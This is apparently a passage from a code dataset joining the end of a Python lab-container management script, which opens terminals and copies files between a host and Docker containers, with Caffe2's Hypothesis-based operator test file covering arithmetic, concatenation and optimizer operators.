os.rmdir(syncdir)
except:
pass
return host_xfer_dir
def DoMoreterm(lab_path, container_name, clone_num=None, alt_name=None):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
if container_name not in start_config.containers:
logger.error("Container %s not found. Container must be one of the following:" % container_name)
for container_name in start_config.containers:
print('\t%s' % container_name)
print("Usage: moreterm.py <lab> <container>")
return False
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
if clone_num is None:
mycontainer_name = '%s.%s.student' % (labname, container_name)
else:
mycontainer_name = '%s.%s-%d.student' % (labname, container_name, clone_num)
if alt_name is not None:
mycontainer_name = alt_name
if not IsContainerCreated(mycontainer_name):
logger.error('DoMoreTerm container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
if start_config.containers[container_name].terminals == -1:
logger.debug("No terminals supported for %s" % container_name)
return False
else:
spawn_command = "gnome-terminal --profile=labtainers -- docker exec -it %s bash -l -c bash > /dev/null 2>&1 &" % mycontainer_name
logger.debug("spawn_command is (%s)" % spawn_command)
os.system(spawn_command)
return True
def DoTransfer(lab_path, container_name, filename, direction):
    '''TBD this is not tested and likely broken'''
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
mycontainer_name = '%s.%s.student' % (labname, container_name)
if not IsContainerCreated(mycontainer_name):
logger.error('container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
container_user = ""
for name, container in start_config.containers.items():
if mycontainer_name == container.full_name:
container_user = container.user
if direction == "TOCONTAINER":
# Transfer from host to container
filename_path = '%s/%s' % (host_xfer_dir, filename)
logger.debug("File to transfer from host is (%s)" % filename_path)
if os.path.exists(filename_path) and os.path.isfile(filename_path):
# Copy file and chown it
command = 'docker cp %s %s:/home/%s/' % (filename_path, mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOCONTAINER) file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to copy file to container %s!\n" % mycontainer_name)
sys.exit(1)
command = 'docker exec %s sudo chown %s:%s /home/%s/%s' % (mycontainer_name, container_user, container_user, container_user, filename)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer chown file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to set permission in container %s!\n" % mycontainer_name)
sys.exit(1)
else:
logger.error('Host does not have %s file' % filename_path)
sys.exit(1)
else:
# Transfer from container to host
command = 'docker cp %s:/home/%s/%s %s/' % (mycontainer_name, container_user, filename, host_xfer_dir)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (filename, result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % mycontainer_name)
sys.exit(1)
def CopyFilesToHost(lab_path, container_name, full_container_name, container_user):
labname = os.path.basename(lab_path)
isValidLab(lab_path)
config_path = os.path.join(lab_path,"config")
copy_path = os.path.join(config_path,"files_to_host.config")
#logger.debug('CopyFilesToHost %s %s %s' % (labname, container_name, full_container_name))
#logger.debug('CopyFilesToHost copypath %s' % copy_path)
if os.path.isfile(copy_path):
with open(copy_path) as fh:
for line in fh:
if not line.strip().startswith('#'):
try:
os.mkdir(os.path.join(os.getcwd(), labname))
except OSError as e:
#logger.error('could not mkdir %s in %s %s' % (labname, os.getcwd(),str(e)))
pass
container, file_name = line.split(':')
if container == container_name:
dest = os.path.join(os.getcwd(), labname, file_name)
command = 'docker cp %s:/home/%s/%s %s' % (full_container_name, container_user,
file_name.strip(), dest)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (file_name,
result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % full_container_name)
sys.exit(1)
def GetContainerId(image):
command = "docker ps"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('GetContainerId, Failed to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
docker_ps_output = output[0].decode('utf-8').splitlines()
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
parts = current_line.split()
if parts[1].startswith(image):
return parts[0]
return None
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings
import hypothesis.strategies as st
import unittest
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto.caffe2_pb2 import TensorProto
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
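# Note (added for clarity): _test_binary and _test_binary_broadcast are test factories: each
# returns a hypothesis-decorated test function for the named Caffe2 operator, which the
# TestOperators methods below invoke explicitly, e.g. _test_binary("Add", ref)(self).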
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, test_gradient=True)(self)
_test_binary_broadcast("Add", ref)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, test_gradient=True)(self)
_test_binary_broadcast("Mul", ref)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 10e-5
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.just(False), # TODO
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
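        # Weight sizing below follows the flat cuDNN RNN parameter layout (an
        # assumption of this test, not quoted from the docs): each layer has
        # an input-to-hidden matrix, a hidden-to-hidden matrix and two bias
        # vectors, and the factor of 4 further down accounts for the four
        # LSTM gates.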
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=hu.gpu_do)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine="CUDNN")
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=hu.gpu_do)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
hu.gpu_do, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
                # Set a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
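        # Reading of the op this reference encodes: with add_axis=1 each
        # input first gains a new dimension at `axis` (as in np.stack) before
        # the concatenation, and Y_dims records every input's extent along
        # that axis.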
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
            # Set a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=0.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
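        # Expected state: the collector is modelled as a ring buffer of
        # capacity num_to_collect=7, so after pushing the 5 input rows twice
        # (two plan iterations) slot i % 7 holds the most recent row written
        # to it.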
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
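        # Update rules exercised by the reference below: plain momentum
        # returns lr * grad + momentum * m as both outputs, while Nesterov
        # momentum forms m_new = momentum * m + lr * grad and returns
        # (1 + momentum) * m_new - momentum * m as the adjusted gradient.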
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
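        # Reference RMSProp update (matching the function just below): the
        # running mean of squared gradients is ms += (1 - decay) * (grad^2 - ms),
        # the momentum buffer becomes momentum * mom + lr * grad / sqrt(eps + ms),
        # and that buffer is emitted as the adjusted gradient.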
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
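        # n accumulates squared gradients and z the FTRL linear term; the
        # closed-form proximal step below zeroes w wherever |z| <= lambda1
        # (L1 sparsity) and otherwise solves for the regularized minimizer,
        # mirroring the standard FTRL-Proximal update.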
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
